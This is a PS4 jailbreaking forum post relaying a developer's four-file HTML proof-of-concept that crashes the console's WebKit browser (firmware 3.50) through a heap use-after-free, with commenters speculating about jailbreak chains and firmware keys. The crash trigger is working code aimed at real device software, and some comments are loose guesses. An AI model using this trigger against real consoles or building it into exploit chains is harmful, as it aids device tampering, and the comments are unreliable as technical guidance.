Category: PS4 Jailbreaking | Thread starter: PSXHAX | Start date: May 21, 2016 at 3:38 PM
Well, that didn't take long: since news of the PS4 WebKit exploit for 3.50 broke, PlayStation 4 developer Hunter128 has stepped up to the plate with a proof-of-concept for the heap use-after-free in WebCore 3.50! :)

Without further ado, here's what he had to say, to quote: Hello. Appears this needs to be posted publicly.. Not sure who felt the need to want fame for this, cough "Qwerty", but that's the last time I am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene, you can blame this guy for why, because I am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
        document.writeln('<html></html>');
      }
    </script>
    <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause an out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!

Comments

sEKTOR

This method is easy, as I said earlier: the gap is there. While not one.
 

PLAYER 1

So, today... what kind of code could be injected, what kind of homebrews could be created based on these findings???

I don't know the PS4 system, so could someone please explain it? Please.
Thanks.
 

Chaos Kid

I think it is in this direction ->

Find a Vuln -> If found, like the memory error -> Check if the vuln is exploitable -> If so, it's a good sign -> Next step: use an exploit for the vuln as an entry point -> entry point OK -> exploit for userland is needed -> if found -> use the exploit for userland to gain kernel access -> now we have kernel access, but another exploit is needed to gain root or run own code....

Just my thinking, it can be wrong; maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is OK....^^
This vulnerability is good; it does work in a few different ways I have tested so far. No need for code injection, and if you stay close to the original compiler you can literally crash the system and see the heap in memory and where the loc pointer should be directed.
Keep in mind I'm not just known for toolchains or kernels; I dig out the info for what's usable and how it can work to come together.
Some information:
This is very close to ODE rigid body moving objects simulation.
 

Winchest

I'm new here.
Just a simple question.

What do the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What do the devs need for a CFW like Rebug, for example?
 

mcmrc1

I'm new here.
Just a simple question.

What do the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What do the devs need for a CFW like Rebug, for example?
First of all they need keys!!! To decrypt the firmware, change the files and encrypt them again so that the PS4 recognizes the firmware as a valid one....

Correct me if I am wrong....
 